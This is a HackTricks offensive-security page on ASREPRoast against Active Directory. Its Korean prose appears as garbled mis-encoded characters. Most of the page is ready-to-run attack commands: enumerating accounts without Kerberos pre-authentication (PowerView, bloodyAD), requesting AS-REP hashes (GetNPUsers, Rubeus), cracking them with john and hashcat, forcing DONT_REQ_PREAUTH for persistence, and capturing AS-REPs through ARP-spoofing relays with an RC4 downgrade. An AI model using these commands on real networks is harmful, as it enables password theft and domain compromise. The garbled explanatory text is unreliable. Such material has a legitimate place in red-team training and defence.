ASREPRoast

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

ASREPRoast

ASREPRoast๋Š” Kerberos ์‚ฌ์ „ ์ธ์ฆ ํ•„์ˆ˜ ์†์„ฑ์ด ์—†๋Š” ์‚ฌ์šฉ์ž๋ฅผ ์•…์šฉํ•˜๋Š” ๋ณด์•ˆ ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค. ๋ณธ์งˆ์ ์œผ๋กœ ์ด ์ทจ์•ฝ์ ์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์‚ฌ์šฉ์ž์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ(DC)์—์„œ ์‚ฌ์šฉ์ž ์ธ์ฆ์„ ์š”์ฒญํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋ฉด DC๋Š” ์‚ฌ์šฉ์ž์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ์—์„œ ํŒŒ์ƒ๋œ ํ‚ค๋กœ ์•”ํ˜ธํ™”๋œ ๋ฉ”์‹œ์ง€๋กœ ์‘๋‹ตํ•˜๋ฉฐ, ๊ณต๊ฒฉ์ž๋Š” ์ด๋ฅผ ์˜คํ”„๋ผ์ธ์—์„œ ํฌ๋ž™ํ•˜์—ฌ ์‚ฌ์šฉ์ž์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๋ฐœ๊ฒฌํ•˜๋ ค๊ณ  ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ๊ณต๊ฒฉ์˜ ์ฃผ์š” ์š”๊ตฌ ์‚ฌํ•ญ์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

  • Kerberos ์‚ฌ์ „ ์ธ์ฆ ๋ถ€์กฑ: ๋Œ€์ƒ ์‚ฌ์šฉ์ž๋Š” ์ด ๋ณด์•ˆ ๊ธฐ๋Šฅ์ด ํ™œ์„ฑํ™”๋˜์–ด ์žˆ์ง€ ์•Š์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  • ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ(DC)์™€์˜ ์—ฐ๊ฒฐ: ๊ณต๊ฒฉ์ž๋Š” ์š”์ฒญ์„ ๋ณด๋‚ด๊ณ  ์•”ํ˜ธํ™”๋œ ๋ฉ”์‹œ์ง€๋ฅผ ๋ฐ›๊ธฐ ์œ„ํ•ด DC์— ์ ‘๊ทผํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  • ์„ ํƒ์  ๋„๋ฉ”์ธ ๊ณ„์ •: ๋„๋ฉ”์ธ ๊ณ„์ •์„ ๋ณด์œ ํ•˜๋ฉด ๊ณต๊ฒฉ์ž๊ฐ€ LDAP ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•ด ์ทจ์•ฝํ•œ ์‚ฌ์šฉ์ž๋ฅผ ๋” ํšจ์œจ์ ์œผ๋กœ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ณ„์ •์ด ์—†์œผ๋ฉด ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž ์ด๋ฆ„์„ ์ถ”์ธกํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

์ทจ์•ฝํ•œ ์‚ฌ์šฉ์ž ์—ด๊ฑฐํ•˜๊ธฐ (๋„๋ฉ”์ธ ์ž๊ฒฉ ์ฆ๋ช… ํ•„์š”)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

AS_REP ๋ฉ”์‹œ์ง€ ์š”์ฒญ

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

Warning

AS-REP Roasting with Rubeus๋Š” 0x17์˜ ์•”ํ˜ธํ™” ์œ ํ˜•๊ณผ 0์˜ ์‚ฌ์ „ ์ธ์ฆ ์œ ํ˜•์„ ๊ฐ€์ง„ 4768์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

ํฌ๋ž˜ํ‚น

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Persistence

์‚ฌ์šฉ์ž์—๊ฒŒ GenericAll ๊ถŒํ•œ(๋˜๋Š” ์†์„ฑ ์“ฐ๊ธฐ ๊ถŒํ•œ)์ด ์žˆ๋Š” ๊ฒฝ์šฐ preauth๊ฐ€ ํ•„์š”ํ•˜์ง€ ์•Š๋„๋ก ๊ฐ•์ œํ•ฉ๋‹ˆ๋‹ค:

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'

ASREProast without credentials

๊ณต๊ฒฉ์ž๋Š” ์ค‘๊ฐ„์ž ๊ณต๊ฒฉ ์œ„์น˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ AS-REP ํŒจํ‚ท์„ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” Kerberos ์‚ฌ์ „ ์ธ์ฆ์ด ๋น„ํ™œ์„ฑํ™”๋˜๋Š” ๊ฒƒ์— ์˜์กดํ•˜์ง€ ์•Š๊ณ  ๋„คํŠธ์›Œํฌ๋ฅผ ํ†ต๊ณผํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ VLAN์˜ ๋ชจ๋“  ์‚ฌ์šฉ์ž์—๊ฒŒ ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค.
ASRepCatcher ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ, ์ด ๋„๊ตฌ๋Š” Kerberos ํ˜‘์ƒ์„ ๋ณ€๊ฒฝํ•˜์—ฌ ํด๋ผ์ด์–ธํŠธ ์›Œํฌ์Šคํ…Œ์ด์…˜์ด RC4๋ฅผ ์‚ฌ์šฉํ•˜๋„๋ก ๊ฐ•์ œํ•ฉ๋‹ˆ๋‹ค.

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ